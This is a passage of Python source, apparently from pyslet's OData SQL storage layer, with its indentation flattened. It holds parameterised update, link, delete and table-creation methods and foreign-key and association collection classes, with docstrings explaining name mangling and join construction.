query = ['SELECT COUNT(*) FROM ', self.table_name, ' WHERE ']
params = self.container.ParamsClass()
where = []
for cname, cvalue in constraints:
where.append('%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
result = transaction.cursor.fetchone()[0]
if result == 0 and concurrency_check:
# could be a concurrency error, repeat with just keys
query = [
'SELECT COUNT(*) FROM ', self.table_name, ' WHERE ']
params = self.container.ParamsClass()
where = []
for cname, cvalue in constraints[:key_len]:
where.append(
'%s=%s' % (cname, params.add_param(cvalue)))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
result = transaction.cursor.fetchone()[0]
if result == 1:
raise edm.ConcurrencyError
if result == 0:
raise KeyError("Entity %s does not exist" %
str(entity.get_location()))
# otherwise, no rows affected, but ignore!
# We finish off the bindings in a similar way to
# insert_entity_sql but this time we need to handle the case
# where there is an existing link and the navigation
# property is not a collection.
for k, dv in entity.navigation_items():
link_end = self.entity_set.navigation[k]
if not dv.bindings:
continue
elif k in nav_done:
dv.bindings = []
continue
aset_name = link_end.parent.name
target_set = dv.target()
target_fk_mapping = self.container.fk_table[target_set.name]
with dv.open() as navCollection:
with target_set.open() as targetCollection:
while dv.bindings:
binding = dv.bindings[0]
if not isinstance(binding, edm.Entity):
targetCollection.select_keys()
binding = targetCollection[binding]
if binding.exists:
if dv.isCollection:
navCollection.insert_link(
binding, transaction)
else:
navCollection.replace_link(binding,
transaction)
else:
if link_end.otherEnd in target_fk_mapping:
# target table has a foreign key
target_fk_values = []
for key_name in self.entity_set.keys:
target_fk_values.append(
(self.container.mangled_names[
(target_set.name,
aset_name,
key_name)],
entity[key_name]))
if not dv.isCollection:
navCollection.clear_links(transaction)
targetCollection.insert_entity_sql(
binding,
link_end.otherEnd,
target_fk_values,
transaction)
else:
# foreign keys are in an auxiliary table
targetCollection.insert_entity_sql(
binding, link_end.otherEnd,
transaction=transaction)
if dv.isCollection:
navCollection.insert_link(
binding, transaction)
else:
navCollection.replace_link(
binding, transaction)
dv.bindings = dv.bindings[1:]
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we might need to distinguish between a failure due to
# fk_values or a missing key
transaction.rollback(e, swallow=True)
raise edm.ConstraintError(
"Update failed for %s : %s" %
(str(
entity.get_location()),
str(e)))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def update_link(
self,
entity,
link_end,
target_entity,
no_replace=False,
transaction=None):
"""Updates a link when this table contains the foreign key
entity
The entity being linked from (must already exist)
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the association being modified.
target_entity
The entity to link to or None if the link is to be removed.
no_replace
If True, existing links will not be replaced. The effect is
to force the underlying SQL query to include a constraint
that the foreign key is currently NULL. By default this
argument is False and any existing link will be replaced.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non-existent entity: " +
str(entity.get_location()))
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
null_cols = []
target_set = link_end.otherEnd.entity_set
aset_name = link_end.parent.name
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
if not nullable and target_entity is None:
raise edm.NavigationError("Can't remove a required link")
if target_entity:
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
if no_replace:
null_cols.append(cname)
else:
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
query.append(', '.join(updates))
# we don't do concurrency checks on links, and we suppress the filter
# check too
query.append(
self.where_clause(entity, params, False, null_cols=null_cols))
query = ''.join(query)
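# Roughly (illustrative names):
#     UPDATE Orders SET OrdersToCustomers_CustomerID=?
#     WHERE OrderID=? [AND OrdersToCustomers_CustomerID IS NULL]
# the trailing constraint only appears when no_replace is True and is
# presumably rendered as an IS NULL test by the base where_clause from
# the null_cols list.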
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
if null_cols:
# raise a constraint failure, rather than a key failure -
# assume entity is good
raise edm.NavigationError(
"Entity %s is already linked through association %s" %
(entity.get_location(), aset_name))
else:
# key failure - unexpected case as entity should be good
raise KeyError("Entity %s does not exist" %
str(entity.get_location()))
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise KeyError("Linked entity %s does not exist" %
str(target_entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def __delitem__(self, key):
with self.entity_set.open() as base:
entity = base.new_entity()
entity.set_key(key)
entity.exists = True # an assumption!
# base.select_keys()
# entity = base[key]
self.delete_entity(entity)
def delete_entity(self, entity, from_end=None, transaction=None):
"""Deletes an entity
Called by the dictionary-like del operator, provided as a
separate method to enable it to be called recursively when
doing cascade deletes and to support transactions.
from_end
An optional
:py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound to
this entity set that represents the link from which we are
being deleted during a cascade delete.
The purpose of this parameter is to prevent cascade deletes
from doubling back on themselves and causing an infinite
loop.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
fk_mapping = self.container.fk_table[self.entity_set.name]
for link_end, nav_name in dict_items(self.entity_set.linkEnds):
if link_end == from_end:
continue
aset_name = link_end.parent.name
if link_end in fk_mapping:
# if we are holding a foreign key then deleting us
# will delete the link too, so nothing to do here.
continue
else:
if (link_end.associationEnd.multiplicity ==
edm.Multiplicity.One):
# we are required, so it must be a 1-? relationship
if nav_name is not None:
# and it is bound to a navigation property so we
# can cascade delete
target_entity_set = link_end.otherEnd.entity_set
with entity[nav_name].open() as links:
with target_entity_set.open() as \
cascade:
links.select_keys()
for target_entity in links.values():
links.delete_link(target_entity,
transaction)
cascade.delete_entity(
target_entity,
link_end.otherEnd,
transaction)
else:
raise edm.NavigationError(
"Can't cascade delete from an entity in %s as "
"the association set %s is not bound to a "
"navigation property" %
(self.entity_set.name, aset_name))
else:
# we are not required, so just drop the links
if nav_name is not None:
with entity[nav_name].open() as links:
links.clear_links(transaction)
# otherwise, annoyingly, we need to do something special
elif aset_name in self.container.aux_table:
# foreign keys are in an association table,
# hardest case as navigation may be unbound so
# we have to call a class method and pass the
# container and connection
SQLAssociationCollection.clear_links_unbound(
self.container, link_end, entity, transaction)
else:
# foreign keys are at the other end of the
# link, we have a method for that...
target_entity_set = link_end.otherEnd.entity_set
with target_entity_set.open() as \
keyCollection:
keyCollection.clear_links(
link_end.otherEnd, entity, transaction)
params = self.container.ParamsClass()
query = ["DELETE FROM "]
query.append(self.table_name)
# WHERE - ignore the filter
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
if rowcount == 0:
raise KeyError
elif rowcount > 1:
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" %
repr(entity.key()))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def delete_link(self, entity, link_end, target_entity, transaction=None):
"""Deletes the link between *entity* and *target_entity*
The foreign key for this link must be held in this entity set's
table.
entity
The entity in this entity set that the link is from.
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the association being modified.
target_entity
The target entity that defines the link to be removed.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to update non-existent entity: " +
str(entity.get_location()))
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
if not nullable:
raise edm.NavigationError(
"Can't remove a required link from association set %s" %
aset_name)
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
query.append(', '.join(updates))
# custom where clause to ensure that the link really existed before we
# delete it
query.append(' WHERE ')
where = []
kd = entity.key_dict()
for k, v in dict_items(kd):
where.append(
'%s=%s' %
(self.container.mangled_names[
(self.entity_set.name, k)], params.add_param(
self.container.prepare_sql_value(v))))
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
where.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
if transaction.cursor.rowcount == 0:
# no rows matched this constraint, entity either doesn't exist
# or wasn't linked to the target
raise KeyError(
"Entity %s does not exist or is not linked to %s" % str(
entity.get_location(),
target_entity.get_location))
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def clear_links(self, link_end, target_entity, transaction=None):
"""Deletes all links to *target_entity*
The foreign key for this link must be held in this entity set's
table.
link_end
The :py:class:`~pyslet.odata2.csdl.AssociationSetEnd` bound
to this entity set that represents this entity set's end of
the association being modified.
target_entity
The target entity that defines the link(s) to be removed.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
updates = []
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = \
self.container.fk_table[self.entity_set.name][link_end]
for key_name in target_set.keys:
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
updates.append('%s=NULL' % cname)
# custom where clause
query.append(', '.join(updates))
query.append(' WHERE ')
where = []
for key_name in target_set.keys:
v = target_entity[key_name]
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
where.append(
'%s=%s' %
(cname,
params.add_param(
self.container.prepare_sql_value(v))))
query.append(' AND '.join(where))
query = ''.join(query)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# catch the nullable violation here, makes it benign to
# clear links to an unlinked target
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Can't remove required link from assocation set %s" %
aset_name)
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def create_table_query(self):
"""Returns a SQL statement and params for creating the table."""
entity = self.new_entity()
query = ['CREATE TABLE ', self.table_name, ' (']
params = self.container.ParamsClass()
cols = []
cnames = {}
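# cnames tracks the column names already declared so that exposed
# foreign key fields are not declared a second time below.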
for c, v in self.select_fields(entity, prefix=False):
if c in cnames:
continue
else:
cnames[c] = True
cols.append("%s %s" %
(c, self.container.prepare_sql_type(v, params)))
# do we have a media stream?
if self.entity_set.entityType.has_stream():
v = edm.EDMValue.from_type(edm.SimpleType.Int64)
c = self.container.mangled_names[(self.entity_set.name, '_value')]
cnames[c] = True
cols.append("%s %s" %
(c, self.container.prepare_sql_type(v, params)))
constraints = []
constraints.append(
'PRIMARY KEY (%s)' %
', '.join(self.container.mangled_names[(self.entity_set.name, x)]
for x in self.entity_set.keys))
# Now generate the foreign keys
fk_mapping = self.container.fk_table[self.entity_set.name]
for link_end in fk_mapping:
aset_name = link_end.parent.name
target_set = link_end.otherEnd.entity_set
nullable, unique = fk_mapping[link_end]
fk_names = []
k_names = []
for key_name in target_set.keys:
# create a dummy value to catch the unusual case where
# there is a default
v = target_set.entityType[key_name]()
cname = self.container.mangled_names[
(self.entity_set.name, aset_name, key_name)]
fk_names.append(cname)
k_names.append(
self.container.mangled_names[(target_set.name, key_name)])
if cname in cnames:
# if a fk is already declared, skip it
continue
else:
cols.append("%s %s" % (
cname,
self.container.prepare_sql_type(
v, params, nullable)))
constraints.append(
"CONSTRAINT %s FOREIGN KEY (%s) REFERENCES %s(%s)" %
(self.container.quote_identifier(aset_name), ', '.join(
fk_names), self.container.mangled_names[
(target_set.name,)], ', '.join(
k_names)))
cols = cols + constraints
query.append(", ".join(cols))
query.append(')')
return ''.join(query), params
def create_table(self):
"""Executes the SQL statement :py:meth:`create_table_query`"""
query, params = self.create_table_query()
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def drop_table_query(self):
"""Returns a SQL statement for dropping the table."""
query = ['DROP TABLE ', self.table_name]
return ''.join(query)
def drop_table(self):
"""Executes the SQL statement :py:meth:`drop_table_query`"""
query = self.drop_table_query()
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s;", query)
transaction.execute(query)
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
class SQLNavigationCollection(SQLCollectionBase, core.NavigationCollection):
"""Abstract class representing all navigation collections.
Additional keyword arguments:
aset_name
The name of the association set that defines this relationship.
This additional parameter is used by the name mangler to obtain
the field name (or table name) used for the foreign keys."""
def __init__(self, aset_name, **kwargs):
self.aset_name = aset_name
super(SQLNavigationCollection, self).__init__(**kwargs)
def __setitem__(self, key, entity):
# sanity check entity to check it can be inserted here
if (not isinstance(entity, edm.Entity) or
entity.entity_set is not self.entity_set):
raise TypeError
if key != entity.key():
raise ValueError
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to link to a non-existent entity: " +
str(entity.get_location()))
self.insert_link(entity)
def insert_link(self, entity, transaction=None):
"""Inserts a link to *entity* into this collection.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
def replace(self, entity):
if (not isinstance(entity, edm.Entity) or
entity.entity_set is not self.entity_set):
raise TypeError
if not entity.exists:
raise edm.NonExistentEntity(
"Attempt to link to a non-existent entity: " +
str(entity.get_location()))
self.replace_link(entity)
def replace_link(self, entity, transaction=None):
"""Replaces all links with a single link to *entity*.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
def delete_link(self, entity, transaction=None):
"""A utility method that deletes the link to *entity* in this collection.
This method is called during cascaded deletes to force-remove a
link prior to the deletion of the entity itself.
transaction
An optional transaction. If present, the connection is left
uncommitted."""
raise NotImplementedError
class SQLForeignKeyCollection(SQLNavigationCollection):
"""The collection of entities obtained by navigation via a foreign key
This object is used when the foreign key is stored in the same table
as *from_entity*. This occurs when the relationship is one of::
0..1 to 1
Many to 1
Many to 0..1
The name mangler looks for the foreign key in the field obtained by
mangling::
(entity set name, association set name, key name)
For example, suppose that a link exists from entity set Orders[*] to
entity set Customers[0..1] and that the key field of Customer is
"CustomerID". If the association set that binds Orders to Customers
with this link is called OrdersToCustomers then the foreign key would
be obtained by looking up::
('Orders','OrdersToCustomers','CustomerID')
By default this would result in the field name::
'OrdersToCustomers_CustomerID'
This field would be looked up in the 'Orders' table. The operation
of the name mangler can be customised by overriding the
:py:meth:`SQLEntityContainer.mangle_name` method in the container."""
def __init__(self, **kwargs):
super(SQLForeignKeyCollection, self).__init__(**kwargs)
self.keyCollection = self.from_entity.entity_set.open()
def reset_joins(self):
"""Overridden to provide an inner join to *from_entity*'s table.
The join clause introduces an alias for the table containing
*from_entity*. The resulting join looks something like this::
SELECT ... FROM Customers
INNER JOIN Orders AS nav1 ON
Customers.CustomerID=nav1.OrdersToCustomers_CustomerID
...
WHERE nav1.OrderID = ?;
The value of the OrderID key property in from_entity is passed as
a parameter when executing the expression.
In most cases, there will be a navigation property bound to this
association in the reverse direction. For example, to continue
the above example, Orders to Customers might be bound to a
navigation property in the reverse direction called, say,
'AllOrders' *in the target entity set*.
If this navigation property is used in an expression then the
existing INNER JOIN defined here is used instead of a new LEFT
JOIN as would normally be the case."""
super(SQLForeignKeyCollection, self).reset_joins()
# nav_name is the navigation property from this entity set that
takes you back to the from_entity. It may be an empty string
# if there is no back link. We need to know this in case
# someone adds this navigation property to an expression, they
# need to use our inner join in preference to the usual left
# join.
nav_name = self.entity_set.linkEnds[self.from_end.otherEnd]
alias = self.next_alias()
join = []
# we don't need to look up the details of the join again, as
# self.entity_set must be the target
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias, self.container.mangled_names[
(self.from_entity.entity_set.name,
self.aset_name, key_name)]))
join = ' INNER JOIN %s AS %s ON ' % (
self.container.mangled_names[(self.from_entity.entity_set.name,)],
alias) + ' AND '.join(join)
self._aliases.add(alias)
self._joins[nav_name] = (alias, join)
self._source_alias = alias
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Adds the constraint for entities linked from *from_entity* only.
We continue to use the alias set in :py:meth:`reset_joins`
where an example WHERE clause is illustrated."""
if self._joins is None:
self.reset_joins()
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(self._source_alias, self.container.mangled_names[
(self.from_entity.entity_set.name, k)], params.add_param(
self.container.prepare_sql_value(v))))
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def insert_entity(self, entity):
transaction = SQLTransaction(self.container, self.connection)
try:
# Because of the nature of the relationships we are used
# for, *entity* can be inserted into the base collection
# without a link back to us (the link is optional from
# entity's point of view). We still force the insert to
# take place without a commit as the insertion of the link
# afterwards might still fail.
transaction.begin()
with self.entity_set.open() as baseCollection:
baseCollection.insert_entity_sql(
entity, self.from_end.otherEnd, transaction=transaction)
self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
no_replace=True,
transaction=transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
# we can't tell why the operation failed, could be a
# KeyError, if we are trying to insert an existing entity or
# could be a ConstraintError if we are already linked to a
# different entity
transaction.rollback(e, swallow=True)
raise edm.NavigationError(str(e))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
return self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
no_replace=True,
transaction=transaction)
def replace_link(self, entity, transaction=None):
# Target multiplicity must be 0..1 or 1; treat it the same as setitem
return self.keyCollection.update_link(
self.from_entity,
self.from_end,
entity,
transaction=transaction)
def delete_link(self, entity, transaction=None):
return self.keyCollection.delete_link(
self.from_entity,
self.from_end,
entity,
transaction=transaction)
def __delitem__(self, key):
# Before we remove a link we need to know if this is a ?-1
# relationship; if so, this deletion will result in a
# constraint violation.
if self.toMultiplicity == edm.Multiplicity.One:
raise edm.NavigationError("Can't remove a required link")
# Turn the key into an entity object as required by delete_link
with self.entity_set.open() as targetCollection:
target_entity = targetCollection.new_entity()
target_entity.set_key(key)
# we open the base collection and call the update link method
self.keyCollection.delete_link(
self.from_entity, self.from_end, target_entity)
def close(self):
if self.keyCollection is not None:
self.keyCollection.close()
super(SQLForeignKeyCollection, self).close()
class SQLReverseKeyCollection(SQLNavigationCollection):
"""The collection of entities obtained by navigation to a foreign key
This object is used when the foreign key is stored in the target
table. This occurs in the reverse of the cases where
:py:class:`SQLForeignKeyCollection` is used, i.e.::
1 to 0..1
1 to Many
0..1 to Many
The implementation is actually simpler in this direction as no JOIN
clause is required."""
def __init__(self, **kwargs):
super(SQLReverseKeyCollection, self).__init__(**kwargs)
self.keyCollection = self.entity_set.open()
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Adds the constraint to entities linked from *from_entity* only."""
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append("%s=%s" % (
self.container.mangled_names[
(self.entity_set.name, self.aset_name, k)],
params.add_param(self.container.prepare_sql_value(v))))
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def insert_entity(self, entity):
transaction = SQLTransaction(self.container, self.connection)
fk_values = []
for k, v in dict_items(self.from_entity.key_dict()):
fk_values.append(
(self.container.mangled_names[
(self.entity_set.name, self.aset_name, k)], v))
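# fk_values carries from_entity's key so that the new row is created
# already linked back to from_entity by insert_entity_sql.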
try:
transaction.begin()
self.keyCollection.insert_entity_sql(
entity, self.from_end.otherEnd, fk_values, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise KeyError(str(entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
return self.keyCollection.update_link(
entity,
self.from_end.otherEnd,
self.from_entity,
no_replace=True,
transaction=transaction)
# we use no_replace mode as the source multiplicity must be 1 or
# 0..1 for this type of collection and if *entity* is already
# linked it would be an error
def replace_link(self, entity, transaction=None):
if self.fromMultiplicity == edm.Multiplicity.One:
# we are required, this must be an error
raise edm.NavigationError(
"Can't delete required link from association set %s" %
self.aset_name)
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
self.keyCollection.clear_links(
self.from_end.otherEnd, self.from_entity, transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(
"Model integrity error when linking %s and %s" %
(str(
self.from_entity.get_location()), str(
entity.get_location())))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def __delitem__(self, key):
entity = self.keyCollection[key]
if self.fromMultiplicity == edm.Multiplicity.One:
# we are required, this must be an error
raise edm.NavigationError(
"Can't delete required link from association set %s" %
self.aset_name)
# fromMultiplicity is 0..1
self.keyCollection.delete_link(
entity, self.from_end.otherEnd, self.from_entity)
def delete_link(self, entity, transaction=None):
"""Called during cascaded deletes.
This is actually a no-operation as the foreign key for this
association is in the entity's record itself and will be removed
automatically when entity is deleted."""
return 0
def clear(self):
self.keyCollection.clear_links(
self.from_end.otherEnd,
self.from_entity)
def clear_links(self, transaction=None):
"""Deletes all links from this collection's *from_entity*
transaction
An optional transaction. If present, the connection is left
uncommitted."""
self.keyCollection.clear_links(
self.from_end.otherEnd, self.from_entity, transaction)
def close(self):
self.keyCollection.close()
super(SQLReverseKeyCollection, self).close()
class SQLAssociationCollection(SQLNavigationCollection):
"""The collection obtained by navigation using an auxiliary table
This object is used when the relationship is described by two sets
of foreign keys stored in an auxiliary table. This occurs mainly
when the link is Many to Many but it is also used for 1 to 1
relationships. This last use may seem odd but it is used to
represent the symmetry of the relationship. In practice, a single
set of foreign keys is likely to exist in one table or the other and
so the relationship is best modelled by a 0..1 to 1 relationship
even if the intention is that the records will always exist in
pairs.
The name of the auxiliary table is obtained from the name mangler
using the association set's name. The keys use a more complex
mangled form to cover cases where there is a recursive Many to Many
relation (such as a social network of friends between User
entities). The names of the keys are obtained by mangling::
( association set name, target entity set name,
navigation property name, key name )
An example should help. Suppose we have entities representing
sports Teams(TeamID) and sports Players(PlayerID) and that you can
navigate from Player to Team using the "PlayedFor" navigation
property and from Team to Player using the "Players" navigation
property. Both navigation properties are collections so the
relationship is Many to Many. If the association set that binds the
two entity sets is called PlayersAndTeams then the auxiliary
table name will be mangled from::
('PlayersAndTeams')
and the fields will be mangled from::
('PlayersAndTeams','Teams','PlayedFor','TeamID')
('PlayersAndTeams','Players','Players','PlayerID')
By default this results in column names 'Teams_PlayedFor_TeamID' and
'Players_Players_PlayerID'. If you are modelling an existing
database then 'TeamID' and 'PlayerID' on their own are more likely
choices. You would need to override the
:py:meth:`SQLEntityContainer.mangle_name` method in the container to
catch these cases and return the shorter column names.
Finally, to ensure the uniqueness of foreign key constraints, the
following names are mangled::
( association set name, association set name, 'fkA')
( association set name, association set name, 'fkB')
Notice that the association set name is used twice: it not only
defines the scope of the name but must also be incorporated into the
constraint name to ensure uniqueness across the entire database."""
def __init__(self, **kwargs):
super(SQLAssociationCollection, self).__init__(**kwargs)
# The relation is actually stored in an extra table so we will
# need a join for all operations.
self.aset_name = self.from_end.parent.name
self.atable_name = self.container.mangled_names[
(self.aset_name,)]
entitySetA, nameA, entitySetB, nameB, self.uniqueKeys = \
self.container.aux_table[self.aset_name]
if self.from_entity.entity_set is entitySetA and self.name == nameA:
self.from_nav_name = nameA
self.toNavName = nameB
else:
self.from_nav_name = nameB
self.toNavName = nameA
def reset_joins(self):
"""Overridden to provide an inner join to the aux table.
If the Customer and Group entities are related with a Many-Many
relationship called Customers_Groups, the resulting join looks
something like this (when the from_entity is a Customer)::
SELECT ... FROM Groups
INNER JOIN Customers_Groups ON
Groups.GroupID = Customers_Groups.Groups_MemberOf_GroupID
...
WHERE Customers_Groups.Customers_Members_CustomerID = ?;
The value of the CustomerID key property in from_entity is
passed as a parameter when executing the expression."""
super(SQLAssociationCollection, self).reset_joins()
join = []
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name,
self.container.mangled_names[(self.entity_set.name,
key_name)],
self.atable_name,
self.container.mangled_names[(self.aset_name,
self.entity_set.name,
self.toNavName, key_name)]))
join = ' INNER JOIN %s ON ' % self.atable_name + ' AND '.join(join)
self._aliases.add(self.atable_name)
self._joins[''] = ('', join)
def add_join(self, name):
"""Overridden to provide special handling of navigation
In most cases, there will be a navigation property bound to this
association in the reverse direction. For Many-Many relations
this can't be used in an expression but if the relationship
is actually 1-1 then we would augment the default INNER JOIN
with an additional INNER JOIN to include the whole of the
from_entity. (Normally we'd think of these expressions as LEFT
joins but we're navigating back across a link that points to a
single entity so there is no difference.)
To illustrate, if Customers have a 1-1 relationship with
PrimaryContacts through a Customers_PrimaryContacts association
set then the expression grows an additional join::
SELECT ... FROM PrimaryContacts
INNER JOIN Customers_PrimaryContacts ON
PrimaryContacts.ContactID =
Customers_PrimaryContacts.PrimaryContacts_Contact_ContactID
INNER JOIN Customers AS nav1 ON
Customers_PrimaryContacts.Customers_Customer_CustomerID =
nav1.CustomerID
...
WHERE Customers_PrimaryContacts.Customers_Customer_CustomerID = ?;
This is a cumbersome query to join two entities that are
supposed to have a 1-1 relationship, which is one of the reasons
why it is generally better to pick one side of the relationship
or the other and make it 0..1 to 1 as this would obviate the
auxiliary table completely and just put a non-NULL, unique
foreign key in the table that represents the 0..1 side of the
relationship."""
if not self._joins:
self.reset_joins()
if name != self.entity_set.linkEnds[self.from_end.otherEnd]:
return super(SQLAssociationCollection, self).add_join(name)
# special handling here
if name in self._joins:
return self._joins[name][0]
# this collection is either 1-1 or Many-Many
src_multiplicity, dst_multiplicity = \
self.entity_set.get_multiplicity(name)
if dst_multiplicity != edm.Multiplicity.One:
# we can't join on this navigation property
raise NotImplementedError(
"NavigationProperty %s.%s cannot be used in an expression" %
(self.entity_set.name, name))
alias = self.next_alias()
target_set = self.from_entity.entity_set
target_table_name = self.container.mangled_names[(target_set.name, )]
join = []
for key_name in target_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.atable_name,
self.container.mangled_names[(self.aset_name, target_set.name,
self.from_nav_name, key_name)],
alias,
self.container.mangled_names[(target_set.name, key_name)]))
join = ' INNER JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
return alias
def where_clause(self, entity, params, use_filter=True, use_skip=False):
"""Provides the *from_entity* constraint in the auxiliary table."""
where = []
for k, v in dict_items(self.from_entity.key_dict()):
where.append(
"%s.%s=%s" %
(self.atable_name,
self.container.mangled_names[
(self.aset_name,
self.from_entity.entity_set.name,
self.from_nav_name,
k)],
params.add_param(
self.container.prepare_sql_value(v))))
if entity is not None:
for k, v in dict_items(entity.key_dict()):
where.append(
"%s.%s=%s" %
(self.atable_name,
self.container.mangled_names[
(self.aset_name,
entity.entity_set.name,
self.toNavName,
k)],
params.add_param(
self.container.prepare_sql_value(v))))
if use_filter and self.filter is not None:
where.append("(%s)" % self.sql_expression(self.filter, params))
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
return ' WHERE ' + ' AND '.join(where)
def insert_entity(self, entity):
"""Rerouted to a SQL-specific implementation"""
self.insert_entity_sql(entity, transaction=None)
def insert_entity_sql(self, entity, transaction=None):
"""Inserts *entity* into the base collection and creates the link.
This is always done in two steps, bound together in a single
transaction (where supported). If this object represents a 1 to
1 relationship then, briefly, we'll be in violation of the
model. This will only be an issue in non-transactional
systems."""
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
with self.entity_set.open() as baseCollection:
# if this is a 1-1 relationship insert_entity_sql will
# fail (with an unbound navigation property) so we need
# to suppress the back-link.
baseCollection.insert_entity_sql(
entity, self.from_end.otherEnd, transaction=transaction)
self.insert_link(entity, transaction)
transaction.commit()
except self.container.dbapi.IntegrityError as e:
transaction.rollback(e, swallow=True)
raise edm.NavigationError(str(entity.get_location()))
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def insert_link(self, entity, transaction=None):
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
query = ['INSERT INTO ', self.atable_name, ' (']
params = self.container.ParamsClass()
value_names = []
values = []
for k, v in dict_items(self.from_entity.key_dict()):
value_names.append(
self.container.mangled_names[
(self.aset_name,
self.from_entity.entity_set.name,
self.from_nav_name,
k)])
values.append(
params.add_param(
self.container.prepare_sql_value(v)))
